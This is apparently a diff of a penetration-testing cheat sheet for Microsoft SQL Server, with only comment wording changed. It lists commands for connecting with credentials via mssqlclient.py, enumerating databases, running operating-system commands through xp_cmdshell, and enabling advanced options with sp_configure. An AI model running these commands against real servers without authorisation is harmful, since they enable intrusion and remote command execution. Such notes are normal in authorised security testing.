 python3 mssqlclient.py user:password@10.10.10.1

-# MSSQL useful commands
+# MSSQL — useful commands once inside

-SELECT name FROM master.dbo.sysdatabases; # list databases
+SELECT name FROM master.dbo.sysdatabases; # list all databases

 USE dbname; SELECT * FROM INFORMATION_SCHEMA.TABLES;

-EXEC xp_cmdshell 'whoami'; # RCE if enabled
+EXEC xp_cmdshell 'whoami'; # RCE if xp_cmdshell is enabled

 EXEC sp_configure 'show advanced options',1; RECONFIGURE;